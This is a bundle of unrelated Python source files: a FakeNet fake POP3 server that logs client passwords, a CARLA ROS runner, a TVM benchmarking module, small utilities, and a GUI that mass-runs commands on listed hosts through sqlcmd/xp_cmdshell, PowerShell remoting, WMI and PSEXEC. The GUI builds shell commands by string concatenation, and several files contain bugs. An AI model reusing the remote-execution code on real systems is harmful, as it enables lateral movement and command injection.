class ThreadedTCPRequestHandler(SocketServer.BaseRequestHandler):
def handle(self):
# Timeout connection to prevent hanging
self.request.settimeout(int(self.server.config.get('timeout', 10)))
try:
self.request.sendall("+OK FakeNet POP3 Server Ready\r\n")
while True:
data = self.request.recv(1024)
if not data:
break
elif len(data) > 0:
for line in data.split("\r\n"):
if line and len(line) > 0:
if ' ' in line:
cmd, params = line.split(' ', 1)
else:
cmd, params = line, ''
handler = getattr(self, 'pop_%s' % (cmd.upper()), self.pop_DEFAULT)
handler(cmd, params)
except socket.timeout:
self.server.logger.warning('Connection timeout')
except socket.error as msg:
self.server.logger.error('Error: %s', msg.strerror or msg)
except Exception, e:
self.server.logger.error('Error: %s', e)
def pop_DEFAULT(self, cmd, params):
self.server.logger.info('Client issued an unknown command %s %s', cmd, params)
self.request.sendall("-ERR Unknown command\r\n")
def pop_APOP(self, cmd, params):
if ' ' in params:
mailbox_name, digest = params.split(' ', 1)
self.server.logger.info('Client requests access to mailbox %s', mailbox_name)
self.request.sendall("+OK %s's maildrop has 2 messages (320 octets)\r\n" % mailbox_name)
else:
self.server.logger.info('Client sent invalid APOP command: APOP %s', params)
self.request.sendall("-ERR\r\n")
def pop_RPOP(self, cmd, params):
mailbox_name = params
self.server.logger.info('Client requests access to mailbox %s', mailbox_name)
self.request.sendall("+OK %s's maildrop has 2 messages (320 octets)\r\n" % mailbox_name)
def pop_USER(self, cmd, params):
self.server.logger.info('Client user: %s', params)
self.request.sendall("+OK User accepted\r\n")
def pop_PASS(self, cmd, params):
self.server.logger.info('Client password: %s', params)
self.request.sendall("+OK Pass accepted\r\n")
def pop_STAT(self, cmd, params):
self.request.sendall("+OK 2 320\r\n")
def pop_LIST(self, cmd, params):
# List all messages
if params == '':
self.request.sendall("+OK 2 messages (320 octets)\r\n")
self.request.sendall("1 120\r\n")
self.request.sendall("2 200\r\n")
self.request.sendall(".\r\n")
# List individual message
else:
self.request.sendall("+OK %d 200\r\n" % params)
self.request.sendall(".\r\n")
def pop_RETR(self, cmd, params):
self.server.logger.info('Client requests message %s', params)
self.request.sendall("+OK 120 octets\r\n")
self.request.sendall(EMAIL + "\r\n")
self.request.sendall(".\r\n")
def pop_DELE(self, cmd, params):
self.server.logger.info('Client requests message %s to be deleted', params)
self.request.sendall("+OK message %s deleted\r\n", params)
def pop_NOOP(self, cmd, params):
self.request.sendall("+OK\r\n")
def pop_RSET(self, cmd, params):
self.request.sendall("+OK maildrop has 2 messages (320 octets)\r\n")
def pop_TOP(self, cmd, params):
self.request.sendall("+OK\r\n")
self.request.sendall("1 120\r\n")
self.request.sendall("2 200\r\n")
self.request.sendall(".\r\n")
def pop_UIDL(self, cmd, params):
if params == '':
self.request.sendall("+OK\r\n")
self.request.sendall("1 whqtswO00WBw418f9t5JxYwZa\r\n")
self.request.sendall("2 QhdPYR:00WBw1Ph7x7a\r\n")
self.request.sendall(".\r\n")
else:
self.request.sendall("+OK %s QhdPYR:00WBw1Ph7x7\r\n", params)
def pop_QUIT(self, cmd, params):
self.request.sendall("+OK FakeNet POP3 server signing off\r\n")
class ThreadedTCPServer(SocketServer.ThreadingMixIn, SocketServer.TCPServer):
pass
###############################################################################
# Testing code
def test(config):
import poplib
logger = logging.getLogger('POPListenerTest')
server = poplib.POP3_SSL('localhost', config.get('port', 110))
logger.info('Authenticating.')
server.user('username')
server.pass_('password')
logger.info('Listing and retrieving messages.')
print server.list()
print server.retr(1)
server.quit()
def main():
logging.basicConfig(format='%(asctime)s [%(name)15s] %(message)s', datefmt='%m/%d/%y %I:%M:%S %p', level=logging.DEBUG)
config = {'port': '110', 'usessl': 'Yes', 'timeout': 30 }
listener = POPListener(config)
listener.start()
###########################################################################
# Run processing
import time
try:
while True:
time.sleep(1)
except KeyboardInterrupt:
pass
###########################################################################
# Run tests
test(config)
if __name__ == '__main__':
main()
|
carla_ros_scenario_runner_node.py
|
#!/usr/bin/env python
#
# Copyright (c) 2020 Intel Corporation.
#
# This work is licensed under the terms of the MIT license.
# For a copy, see <https://opensource.org/licenses/MIT>.
#
"""
Execute scenarios via ros service
Internally, the CARLA scenario runner is executed
"""
import sys
import os
try:
import queue
except ImportError:
import Queue as queue
from carla_ros_scenario_runner_types.srv import ExecuteScenario
from carla_ros_scenario_runner_types.msg import CarlaScenarioRunnerStatus
from carla_ros_scenario_runner.application_runner import ApplicationStatus # pylint: disable=relative-import
from carla_ros_scenario_runner.scenario_runner_runner import ScenarioRunnerRunner # pylint: disable=relative-import
from ros_compatibility import (
CompatibleNode,
QoSProfile,
ros_ok,
ros_init,
get_service_response,
ros_shutdown,
loginfo,
ROS_VERSION)
# Check Python dependencies of scenario runner
try:
import carla # pylint: disable=unused-import
except ImportError:
print("ERROR: CARLA Python Egg not available. Please add \
<CARLA_DIR>/PythonAPI/carla/dist/carla-<CARLA_VERSION>-\
py<PYTHON_VERSION>-linux-x86_64.egg to your PYTHONPATH.")
sys.exit(1)
try:
from agents.navigation.local_planner import LocalPlanner # pylint: disable=unused-import
except ImportError:
print("ERROR: CARLA Python Agents not available. \
Please add <CARLA_DIR>/PythonAPI/carla to your PYTHONPATH.")
sys.exit(1)
if ROS_VERSION == 2:
import threading
class CarlaRosScenarioRunner(CompatibleNode):
"""
Execute scenarios via ros service
"""
def __init__(self):
"""
Constructor
"""
super(CarlaRosScenarioRunner, self).__init__('carla_ros_scenario_runner')
role_name = self.get_param("role_name", "ego_vehicle")
scenario_runner_path = self.get_param("scenario_runner_path", "")
wait_for_ego = self.get_param("wait_for_ego", "True")
host = self.get_param("host", "localhost")
port = self.get_param("port", 2000)
self._status_publisher = self.new_publisher(
CarlaScenarioRunnerStatus, "/scenario_runner/status",
qos_profile=QoSProfile(depth=1, durability=1))
self.scenario_runner_status_updated(ApplicationStatus.STOPPED)
self._scenario_runner = ScenarioRunnerRunner(
scenario_runner_path,
host,
port,
wait_for_ego,
self.scenario_runner_status_updated,
self.scenario_runner_log)
self._request_queue = queue.Queue()
self._execute_scenario_service = self.new_service(
ExecuteScenario, '/scenario_runner/execute_scenario', self.execute_scenario)
def scenario_runner_log(self, log): # pylint: disable=no-self-use
"""
Callback for application logs
"""
self.logwarn("[SC]{}".format(log))
def scenario_runner_status_updated(self, status):
"""
Executed from application runner whenever the status changed
"""
self.loginfo("Status updated to {}".format(status))
val = CarlaScenarioRunnerStatus.STOPPED
if status == ApplicationStatus.STOPPED:
val = CarlaScenarioRunnerStatus.STOPPED
elif status == ApplicationStatus.STARTING:
val = CarlaScenarioRunnerStatus.STARTING
elif status == ApplicationStatus.RUNNING:
val = CarlaScenarioRunnerStatus.RUNNING
elif status == ApplicationStatus.SHUTTINGDOWN:
val = CarlaScenarioRunnerStatus.SHUTTINGDOWN
else:
val = CarlaScenarioRunnerStatus.ERROR
status = CarlaScenarioRunnerStatus()
status.status = val
self._status_publisher.publish(status)
def execute_scenario(self, req, response=None):
"""
Execute a scenario
"""
self.loginfo("Scenario Execution requested...")
response = get_service_response(ExecuteScenario)
response.result = True
if not os.path.isfile(req.scenario.scenario_file):
self.logwarn("Requested scenario file not existing {}".format(
req.scenario.scenario_file))
response.result = False
else:
self._request_queue.put(req.scenario)
return response
def run(self):
"""
Control loop
:return:
"""
current_req = None
while ros_ok():
if current_req:
if self._scenario_runner.is_running():
self.loginfo("Scenario Runner currently running. Shutting down.")
self._scenario_runner.shutdown()
self.loginfo("Scenario Runner stopped.")
self.loginfo("Executing scenario {}...".format(current_req.name))
# execute scenario
scenario_executed = self._scenario_runner.execute_scenario(
current_req.scenario_file)
if not scenario_executed:
self.logwarn("Unable to execute scenario.")
current_req = None
else:
try:
current_req = self._request_queue.get(block=True, timeout=0.5)
except queue.Empty:
# no new request
pass
if self._scenario_runner.is_running():
self.loginfo("Scenario Runner currently running. Shutting down.")
self._scenario_runner.shutdown()
def main(args=None):
"""
main function
:return:
"""
ros_init(args)
scenario_runner = CarlaRosScenarioRunner()
if ROS_VERSION == 2:
spin_thread = threading.Thread(target=scenario_runner.spin, daemon=True)
spin_thread.start()
try:
scenario_runner.run()
except KeyboardInterrupt:
loginfo("User requested shut down.")
finally:
if scenario_runner._scenario_runner.is_running():
scenario_runner.loginfo("Scenario Runner still running. Shutting down.")
scenario_runner._scenario_runner.shutdown()
del scenario_runner
ros_shutdown()
if ROS_VERSION == 2:
spin_thread.join()
if __name__ == "__main__":
main()
|
multi_thread.py
|
import time
from threading import Thread
CONTADOR = 50000000
def contagem_regressiva(n):
while n > 0:
n -= 1
t1 = Thread(target=contagem_regressiva, args=(CONTADOR//2,))
t2 = Thread(target=contagem_regressiva, args=(CONTADOR//2,))
inicio = time.time()
t1.start()
t2.start()
t1.join()
t2.join()
fim = time.time()
print(f'Tempo em segundos - {fim - inicio}')
|
vlcoutput.py
|
""" allows playing of audio media files via the VLC command line """
from __future__ import absolute_import
from __future__ import unicode_literals
import os
import subprocess
import threading
_MACOSX_VLC_PATH = '/Applications/VLC.app/Contents/MacOS/VLC'
_VLC_PARAMS = ['-I', 'rc', '--play-and-exit']
_DEVNULL = open(os.devnull, 'w')
class VlcOutput(object):
""" allows playing of audio media files via the VLC command line """
def __init__(self, config):
self.playing = False
self._current_process = None
self._play_interrupted = threading.Event()
self._process_lock = threading.Lock()
self._on_finish_cb = None
if 'output.vlc.path' in config:
self._vlc_path = config['output.vlc.path']
elif os.path.isfile(_MACOSX_VLC_PATH):
self._vlc_path = _MACOSX_VLC_PATH
else:
raise ValueError('Failed to locate path to VLC, ' +
'set output.vlc.path')
def play(self, audio_url, on_finish_cb=None):
""" starts playing the audio file and immediately returns """
if self.playing or self._current_process:
self.stop()
vlc_cmd = [self._vlc_path] + _VLC_PARAMS + [audio_url]
vlc_process = subprocess.Popen(
vlc_cmd, stdout=_DEVNULL, stderr=_DEVNULL)
self._current_process = vlc_process
self._play_interrupted.clear()
self._on_finish_cb = on_finish_cb
self.playing = True
vlc_exit_thread = threading.Thread(
target=self._wait_for_vlc_exit)
vlc_exit_thread.start()
def blocking_play(self, audio_url):
""" plays the audio file and only returns when complete """
self.play(audio_url)
self._current_process.wait()
def stop(self):
""" terminates any current vlc process """
if self.playing and self._current_process:
with self._process_lock:
old_process = self._current_process
self._current_process = None
self.playing = False
self._play_interrupted.set()
old_process.terminate()
def _wait_for_vlc_exit(self):
while self.playing:
return_code = self._current_process.poll()
if return_code is not None:
break
if self._play_interrupted.wait(0.1):
break
with self._process_lock:
self._current_process = None
self.playing = False
if self._on_finish_cb:
self._on_finish_cb()
|
measure.py
|
import tvm
import os
import sys
import shutil
import tvm._ffi
import numpy as np
import random
import multiprocessing
import multiprocessing.pool
import psutil
import signal
import queue
from pebble import concurrent
from concurrent.futures import TimeoutError
from pebble import ProcessPool, ProcessExpired
from ..utils import to_tuple, ERROR
from tvm import tg
from tvm import auto_tensorize as at
GLOBAL_BUILD_ARGS = None
measure_card_id = 0
measure_number = 10
measure_timeout = 10
measure_parallel = multiprocessing.cpu_count()
class EvaluationContext(object):
def __init__(self):
self.task_queue = multiprocessing.Queue()
self.result_queue = multiprocessing.Queue()
self.stop = False
self.dir_name = "evaluate_pool"
self.file_name = "to_evaluate"
self.file_path = os.path.join(self.dir_name, self.file_name)
if not (os.path.exists(self.dir_name) and os.path.isdir(self.dir_name)):
os.mkdir(self.dir_name)
elif not (len(os.listdir(self.dir_name)) == 0):
shutil.rmtree(self.dir_name)
os.mkdir(self.dir_name)
GLOBAL_EVAL_CTX = EvaluationContext()
class TensorizeContext(object):
def __init__(self):
self.task_queue = multiprocessing.Queue()
self.result_queue = multiprocessing.Queue()
self.stop = False
GLOBAL_TENSORIZE_CTX = TensorizeContext()
def set_measure_card_id(new_id):
global measure_card_id
measure_card_id = new_id
def set_meaure_number(new_number):
global measure_number
measure_number = new_number
def set_measure_timeout(new_timeout):
global measure_timeout
measure_timeout = new_timeout
def set_measure_parallel(new_parallel):
global measure_parallel
measure_parallel = new_parallel
class NoDaemonProcess(multiprocessing.Process):
@property
def daemon(self):
return False
@daemon.setter
def daemon(self, value):
pass
class NoDaemonContext(type(multiprocessing.get_context())):
Process = NoDaemonProcess
class NoDaemonPool(multiprocessing.pool.Pool):
"""A no daemon pool version of multiprocessing.Pool.
This allows us to start new processings inside the worker function"""
def __init__(self, *args, **kwargs):
kwargs['context'] = NoDaemonContext()
super().__init__(*args, **kwargs)
def __reduce__(self):
pass
def kill_child_processes(parent_pid, sig=signal.SIGTERM):
"""kill all child processes recursively"""
try:
parent = psutil.Process(parent_pid)
except psutil.NoSuchProcess:
return
children = parent.children(recursive=True)
for process in children:
try:
process.send_signal(sig)
except psutil.NoSuchProcess:
return
def call_func_with_timeout(timeout, func, args=(), kwargs=None):
"""Call a function with timeout"""
def func_wrapper(que):
if kwargs:
que.put(func(*args, **kwargs))
else:
que.put(func(*args))
que = multiprocessing.Queue(2)
process = multiprocessing.Process(target=func_wrapper, args=(que,))
process.start()
process.join(timeout)
try:
res = que.get(block=False)
except queue.Empty:
res = TimeoutError()
# clean queue and process
kill_child_processes(process.pid)
process.terminate()
process.join()
que.close()
que.join_thread()
del process
del que
return res
def evaluate_function(sch, tensors, target):
arrays = []
ctx = tvm.context(target.kind, measure_card_id)
for t in tensors:
ary = tvm.nd.array(np.random.uniform(-1, 1, to_tuple(t.shape)).astype(t.dtype))
arrays.append(ary)
try:
print("check target:", target)
print("check context:", ctx.exist)
func = tvm.build(sch, tensors, target)
time_evaluator = func.time_evaluator(func.entry_name, ctx, number=measure_number)
except Exception as e:
print(e)
return e
return time_evaluator(*arrays).mean * 1e3
def measure_function(index, q=None):
global GLOBAL_BUILD_ARGS
if GLOBAL_BUILD_ARGS is None:
raise RuntimeError("No build arguments found!")
schedules, tensors, target = GLOBAL_BUILD_ARGS
print("check context outer:", tvm.context(target.kind, 0).exist)
sch = schedules[index]
measure = call_func_with_timeout(measure_timeout, evaluate_function, args=(sch, tensors, target))
if isinstance(measure, TimeoutError):
ret = float("inf")
elif isinstance(measure, Exception):
ret = float("inf")
ret = measure
if q is not None:
q.put(ret)
return ret
def measure_multi_function(number):
processes = []
ques = []
res = []
for i in range(number):
q = multiprocessing.Queue()
p = multiprocessing.Process(target=measure_function, args=(i, q))
p.start()
processes.append(p)
ques.append(q)
for p in processes:
p.join()
for q in ques:
res.append(q.get())
return res
# @tvm._ffi.register_func("tg.autoschedule.judge_schedule")
def judge_schedule(schedules, tensors, target, gflop, policy):
print("check context outer outer:", tvm.context(target.kind, 0).exist)
if policy == "profile":
global GLOBAL_BUILD_ARGS
GLOBAL_BUILD_ARGS = (schedules, tensors, target)
pool = NoDaemonPool(measure_parallel)
res = pool.map(measure_function, range(len(schedules)))
pool.terminate()
pool.join()
del pool
# res = measure_multi_function(len(schedules))
ret = []
for r in res:
if r == float("inf"):
ret.append(0.0)
elif abs(r) < 1e-5:
ret.append(0.0)
else:
ret.append(gflop / r)
return ret
elif policy == "model":
sys.exit("Not implemented policy: model")
else:
sys.exit("No support for policy: %s" % policy)
@tvm._ffi.register_func("tg.runtime.evaluate_performance")
def evaluate_performance(modules, name, tensors):
global GLOBAL_EVAL_CTX
file_path = GLOBAL_EVAL_CTX.file_path
for i, module in enumerate(modules):
module.export_library(file_path + "_" + str(i) + ".so")
tensor_ctx = []
for t in tensors:
tensor_ctx.append({"shape": to_tuple(t.shape), "dtype": str(t.dtype)})
GLOBAL_EVAL_CTX.task_queue.put({"name": name, "tensor_ctx": tuple(tensor_ctx), "number": len(modules)})
results = GLOBAL_EVAL_CTX.result_queue.get()
for i in range(len(modules)):
os.remove(file_path + "_" + str(i) + ".so")
print("measure:", results, flush=True)
return results
def start_evaluate():
global GLOBAL_EVAL_CTX
GLOBAL_EVAL_CTX.stop = False
def stop_evaluate():
global GLOBAL_EVAL_CTX
GLOBAL_EVAL_CTX.stop = True
GLOBAL_EVAL_CTX.task_queue.put(-1)
# @concurrent.process(timeout=10)
def _evaluate(args):
idx, target, dev_id, name, tensor_ctx = args
global GLOBAL_EVAL_CTX
file_path = GLOBAL_EVAL_CTX.file_path
arrays = []
ctx = tvm.context(target, dev_id)
for t_ctx in tensor_ctx:
ary = tvm.nd.array(np.random.uniform(-1, 1, t_ctx["shape"]).astype(t_ctx["dtype"]), ctx)
arrays.append(ary)
func = tvm.runtime.load_module(file_path + "_" + str(idx) + ".so")
time_evaluator = func.time_evaluator(name, ctx, number=5)
result = time_evaluator(*arrays).mean * 1e3
return result
@concurrent.process(daemon=False)
def evaluate_function_for(target, dev_id, timeout=10):
global GLOBAL_EVAL_CTX
while not GLOBAL_EVAL_CTX.stop:
if not GLOBAL_EVAL_CTX.task_queue.empty():
name_tensor_ctx = GLOBAL_EVAL_CTX.task_queue.get()
if isinstance(name_tensor_ctx, int) and name_tensor_ctx == -1:
break
name = name_tensor_ctx["name"]
tensor_ctx = name_tensor_ctx["tensor_ctx"]
number = name_tensor_ctx["number"]
with ProcessPool() as pool:
args = []
for i in range(number):
args.append((i, target, dev_id, name, tensor_ctx))
future = pool.map(_evaluate, args, timeout=timeout)
iterator = future.result()
results = []
while True:
try:
result = next(iterator)
except StopIteration:
break
except Exception as error:
# print("Exception!", type(error), str(error), flush=True)
result = -1.0
results.append(result)
GLOBAL_EVAL_CTX.result_queue.put(results)
return 0
def _auto_tensorize_cuda(args):
sch, tensors, log_file, trials = args
target = "cuda"
measure_opt = at.MeasureOptions(
target=target, timeout=100, number=200, min_repeat_ms=500)
target_dag = at.compute_dag_from_tensors(tensors)
result = at.auto_tensorize(
target_dag, target, log_file, measure_opt, trials=trials, transform_dump=True)
if result.defined():
sch, args = at.get_schedule(result.sch_app, result.params)
return {sch: args}
else:
return {sch: []}
@concurrent.process(daemon=False)
def auto_tensorize_for(timeout=3600):
global GLOBAL_TENSORIZE_CTX
while not GLOBAL_TENSORIZE_CTX.stop:
if not GLOBAL_TENSORIZE_CTX.task_queue.empty():
tensorize_ctx = GLOBAL_TENSORIZE_CTX.task_queue.get()
if isinstance(tensorize_ctx, int) and tensorize_ctx == -1:
break
sch = tensorize_ctx["sch"]
tensors = tensorize_ctx["tensors"]
log_file = tensorize_ctx["log_file"]
trials = tensorize_ctx["trials"]
# with ProcessPool(1) as pool:
args = (sch, tensors, log_file, trials)
# future = pool.map(_auto_tensorize_cuda, args, timeout=timeout)
# iterator = future.result()
# results = []
# while True:
# try:
# result = next(iterator)
# except StopIteration:
# break
# except Exception as error:
# # print("Exception!", type(error), str(error), flush=True)
# result = {sch: []}
# results.append(result)
results = _auto_tensorize_cuda(args)
GLOBAL_TENSORIZE_CTX.result_queue.put(results)
return 0
# @tvm._ffi.register_func("tg.autoschedule.auto_tensorize_cuda")
def auto_tensorize_cuda(sch, tensors, log_file, trials):
global GLOBAL_TENSORIZE_CTX
GLOBAL_TENSORIZE_CTX.task_queue.put(
{"sch": sch, "tensors": tensors, "log_file": log_file, "trials": trials})
results = GLOBAL_TENSORIZE_CTX.result_queue.get()
print("auto_tensorize success!", flush=True)
return results
def start_tensorize():
global GLOBAL_TENSORIZE_CTX
GLOBAL_TENSORIZE_CTX.stop = False
def stop_tensorize():
global GLOBAL_TENSORIZE_CTX
GLOBAL_TENSORIZE_CTX.stop = True
GLOBAL_TENSORIZE_CTX.task_queue.put(-1)
def set_evaluate_performance(func):
tvm._ffi.register_func("tg.runtime.evaluate_performance", func, True)
|
gui1_support.py
|
#! /usr/bin/env python
# -*- coding: utf-8 -*-
#
# Support module generated by PAGE version 4.18
# in conjunction with Tcl version 8.6
# Nov 11, 2018 03:57:06 PM CET platform: Windows NT
import sys, gui1, subprocess, threading, time, psutil, base64, re
MEMORY_LIMIT_PERCENT=60
CPU_LIMIT_PERCENT=30
thread_limit=10
block=False
run_block=False
first_run=True
No_Cred=False
try:
import Tkinter as tk
except ImportError:
import tkinter as tk
try:
import ttk
py3 = False
except ImportError:
import tkinter.ttk as ttk
py3 = True
def set_Tk_var():
global wrn
wrn = tk.StringVar()
global combobox
combobox = 'tk.StringVar()'
def main():
global CREATE_NO_WINDOW,block,hosts_parsed,run_block,querry,user,passw,CHECK_PER,sqlcmd_mode,first_run,selection,No_Cred,opts
CREATE_NO_WINDOW = 0x08000000
CHECK_PER=10
Checked=False
if not run_block:
selection=w.TCombobox1.get()
if selection=="sqlcmd":
querry=w.Scrolledtext2.get(0.0,"end").replace('\n', ' ')
elif selection=="Invoke-Command" or selection=="Invoke-WmiMethod":
querry=w.Scrolledtext2.get(0.0,"end").replace('\n', ';')
elif selection=="PSEXEC":
querry=w.Scrolledtext2.get(0.0,"end").replace('\n', ';')
querry=w.Scrolledtext2.get(0.0,"end").replace('powershell', 'powershell -inputformat none')
querry=querry[:-1]
user=w.Entry1.get().replace(' ', '').replace('\n', '')
passw=w.Entry2.get().replace(' ', '').replace('\n', '').encode('base64')
hosts=w.Scrolledtext1.get(0.0,"end").encode("ascii")
opts=w.Entry3.get()
sqlcmd_mode=False
if len(hosts)>0 and len(querry)>0 and "-Querry-" not in querry and "-Hosts-" not in hosts:
if selection=="sqlcmd" and len(passw)>0 and len(user)>0 and "Username" not in user and "Username" not in passw.decode('base64'):
Checked=True
elif selection=="Invoke-Command" or selection=="Invoke-WmiMethod" or selection=="PSEXEC":
Checked=True
No_Cred=False
if len(passw)==0 or len(user)==0 or "Username" in user or "Username" in passw.decode('base64'):
No_Cred=True
if Checked:
first_run=False
run_block=True
w.TProgressbar1['value']=0
w.Scrolledtext3.delete(1.0,"end")
w.Button1.configure(text="Running")
hosts_parsed=hosts.splitlines()
if selection=="sqlcmd" and re.search("xp_cmdshell",querry,re.IGNORECASE):
querry=querry.replace('xp_cmdshell', 'exec xp_cmdshell')
querry=querry.replace('"', '""')
sqlcmd_mode=True
threading.Thread(target=check_system).start()
threading.Thread(target=launcher).start()
def launcher():
global hosts_parsed,iterations,CHECK_PER,block,thread_limit
iterations=0
for line in hosts_parsed:
if len(line)>0:
if block or threading.activeCount()>thread_limit:
while threading.activeCount()>6:
time.sleep(1)
thread = threading.Thread(target=procedure,args=(line.splitlines()))
thread.start()
else:
pass
if iterations%20==0 and iterations!=0 and len(hosts_parsed)!=(iterations+1):
time.sleep(0.2)
iterations+=1
w.TProgressbar1['value']=(float(float(iterations)/float(len(hosts_parsed))))*100
def procedure(dest):
global iterations,hosts_parsed,run_block,querry,user,passw,sqlcmd_mode,selection,No_Cred,opts
try:
if selection=="sqlcmd":
if sqlcmd_mode:
if "Opts.(Default)" in opts or len(opts)<1:
opts="-l 10 -t 30"
w.Entry3.delete(first=0,last=100)
w.Entry3.insert('insert',"Opts.(Default)")
out = subprocess.check_output("chcp 65001>NUL && @echo ON && sqlcmd -S "+dest+" -U "+user+" -P "+passw.decode('base64')+" -Q "+'"'+querry+'"'+" -s "+'"'+'|'+'"'+
" "+opts+" && exit",shell=True, bufsize=-1 , stderr=subprocess.STDOUT, stdin=subprocess.PIPE, close_fds=False, creationflags=CREATE_NO_WINDOW).decode("utf-8")
else:
if "Opts.(Default)" in opts or len(opts)<1:
opts="-y 32 -Y 32 -l 10 -t 60"
w.Entry3.delete(first=0,last=100)
w.Entry3.insert('insert',"Opts.(Default)")
out = subprocess.check_output("chcp 65001>NUL && @echo ON && sqlcmd -S "+dest+" -U "+user+" -P "+passw.decode('base64')+" -Q "+'"'+"SET NOCOUNT ON;"+querry+'"'+" -s "+'"'+'|'+'"'+
" "+opts+" && exit",shell=True, bufsize=-1 ,stderr=subprocess.STDOUT, stdin=subprocess.PIPE, close_fds=False, creationflags=CREATE_NO_WINDOW).decode("utf-8")
elif selection=="Invoke-Command":
if "Opts.(Default)" in opts or len(opts)<1:
opts=""
w.Entry3.delete(first=0,last=100)
w.Entry3.insert('insert',"Opts.(Default)")
if No_Cred:
out = subprocess.check_output("chcp 65001>NUL && powershell -ExecutionPolicy RemoteSigned -Command "+'"'+
"Invoke-Command -ComputerName "+dest+" -ScriptBlock {"+querry+"}"+" "+opts+
'"',shell=True, bufsize=-1 , stderr=subprocess.STDOUT, stdin=subprocess.PIPE, close_fds=False, creationflags=CREATE_NO_WINDOW).decode("utf-8")
else:
out = subprocess.check_output("chcp 65001>NUL && powershell -ExecutionPolicy RemoteSigned -Command "+'"'+"$Password = '"+passw.decode('base64')+
"';$pass = ConvertTo-SecureString -AsPlainText $Password -Force;$Cred = New-Object System.Management.Automation.PSCredential -ArgumentList "+user+",$pass;"+
"Invoke-Command -ComputerName "+dest+" -Credential $Cred -ScriptBlock {"+querry+"}"+" "+opts+
'"',shell=True, bufsize=-1 , stderr=subprocess.STDOUT, stdin=subprocess.PIPE, close_fds=False, creationflags=CREATE_NO_WINDOW).decode("utf-8")
elif selection=="Invoke-WmiMethod":
if "Opts.(Default)" in opts or len(opts)<1:
opts=""
w.Entry3.delete(first=0,last=100)
w.Entry3.insert('insert',"Opts.(Default)")
if No_Cred:
out = subprocess.check_output("chcp 65001>NUL && powershell -ExecutionPolicy RemoteSigned -Command "+'"'+
r"$proc = Invoke-WmiMethod -class Win32_process -name Create -ArgumentList 'CMD.EXE /c "+querry+r" > C:\temp\result.txt && exit' -ComputerName '"+dest+
"'"+" "+opts+r";$Process = Get-Process -ID $proc.processid;$Process.WaitForExit();Get-Content \\"+dest+r"\C$\temp\result.txt"+
'"',shell=True, bufsize=-1 , stderr=subprocess.STDOUT, stdin=subprocess.PIPE, close_fds=False, creationflags=CREATE_NO_WINDOW).decode("utf-8")
else:
out = subprocess.check_output("chcp 65001>NUL && powershell -ExecutionPolicy RemoteSigned -Command "+'"'+"$Password ='"+passw.decode('base64')+
r"';$pass = ConvertTo-SecureString -AsPlainText $Password -Force;$Cred = New-Object System.Management.Automation.PSCredential -ArgumentList "+user+",$pass;"+
r"$proc = Invoke-WmiMethod -class Win32_process -name Create -ArgumentList 'CMD.EXE /c "+querry+r" > C:\temp\result.txt' -ComputerName '"+dest+
"'"+" "+opts+r"' -Credential $Cred;$Process = Get-Process -ID $proc.processid;$Process.WaitForExit();Get-Content \\"+dest+r"\C$\temp\result.txt -Credential $Cred;"+
'"',shell=True, bufsize=-1 , stderr=subprocess.STDOUT, stdin=subprocess.PIPE, close_fds=False, creationflags=CREATE_NO_WINDOW).decode("utf-8")
elif selection=="PSEXEC":
if "Opts.(Default)" in opts or len(opts)<1:
opts="-s"
w.Entry3.delete(first=0,last=100)
w.Entry3.insert('insert',"Opts.(Default)")
if No_Cred:
out = subprocess.check_output(r"chcp 65001>NUL && .\PSEXEC /accepteula \\"+dest+" "+opts+" cmd /c "+'"'+querry+'"'+" && exit",shell=True, bufsize=-1 , stderr=subprocess.STDOUT, stdin=subprocess.PIPE, close_fds=False, creationflags=CREATE_NO_WINDOW).decode("utf-8")
else:
out = subprocess.check_output(r"chcp 65001>NUL && .\PSEXEC /accepteula \\"+dest+" -u "+user+" -p "+passw.decode('base64')+" "+opts+" cmd /c "+'"'+querry+'"'+" && exit",shell=True, bufsize=-1 , stderr=subprocess.STDOUT, stdin=subprocess.PIPE, close_fds=False, creationflags=CREATE_NO_WINDOW).decode("utf-8")
else:
destroy_window()
w.Scrolledtext3.insert("end",'\n'+"++++++++++++++++++++++++++++++++++++++++"+'\n'+"--------------------"+"Output from: "+dest+'\n'+out)
except subprocess.CalledProcessError as e:
w.Scrolledtext3.insert("end",'\n'+"++++++++++++++++++++++++++++++++++++++++"+'\n'+"--------------------"+"Output from: "+dest+ " (ERROR!)"+'\n'+e.output)
except Exception as e:
if hasattr(e, 'message'):
w.Scrolledtext3.insert("end",'\n'+"++++++++++++++++++++++++++++++++++++++++"+'\n'+"--------------------"+"Output from: "+dest+ " (ERROR!)"+'\n'+getattr(e, 'message', repr(e)))
else:
w.Scrolledtext3.insert("end",'\n'+"++++++++++++++++++++++++++++++++++++++++"+'\n'+"--------------------"+"Output from: "+dest+ " (ERROR!)"+'\n'+"Unknown error !!!")
if iterations>=len(hosts_parsed):
w.Button1.configure(text='''GO''')
w.Scrolledtext3.see("end")
w.TProgressbar1['value']=0
run_block=False
else:
run_block=True
def check_system():
global run_block,block,thread_limit
while run_block:
current_cpu=psutil.cpu_percent(interval=0.2, percpu=False)
if psutil.virtual_memory().percent<MEMORY_LIMIT_PERCENT and current_cpu<CPU_LIMIT_PERCENT:
block=False
thread_limit+=2
else:
block=True
thread_limit-=2
def init(top, gui, *args, **kwargs):
global w, top_level, root
w = gui
top_level = top
root = top
def destroy_window():
# Function which closes the window.
global top_level,run_block,hosts_parsed
hosts_parsed = []
run_block=False
top_level.destroy()
top_level = None
if __name__ == '__main__':
import gui1.py
gui1.py.vp_start_gui()
|
imageService.py
|
import asyncio
import time
import base64
import requests
from threading import Thread, Lock
from time import sleep
from apps.Config.config import config
class ImageService:
groundstation_url = (
config.values["groundstation"]["ip"]
+ ":"
+ config.values["groundstation"]["port"]
)
def __init__(self):
self.img_path = "~/obc/images/"
self.status = "down"
self.image_queue = []
self.mutex = Lock()
self.poll_time = int(config.values["image_service"]["interval"])
# The start and stop functions do not need to be used if the programmer
# thinks that this class should not take the form of a process
def start(self):
# this function is responsible for inidtializing connections
# and processes that may be used by the ImageService class
# self.status = 'maybe running'
print("starting imageService")
image_queue_thread = Thread(
target=self.poll_image_queue, args=(self.poll_time,)
)
image_queue_thread.start()
# poll_time is the amount of time in seconds that the thread sleeps in between
# checking the queue if there is an image ready to be sent to groundstation
def poll_image_queue(self, poll_time):
while True:
self.mutex.acquire()
img_to_send = self.peekImageQueue()
if img_to_send is not None:
img_to_send["image"] = self.get_encoded_img(img_to_send["image"])
if img_to_send["image"] is not None:
if self.send_img(img_to_send):
self.popImageQueue()
else:
self.popImageQueue()
self.mutex.release()
sleep(poll_time)
# test function to put images in the queue
def add_new_image_to_queue(self, add_time):
x = 0
while True:
self.appendImageQueue("photo" + str(x % 3 + 1) + ".jpg")
x += 1
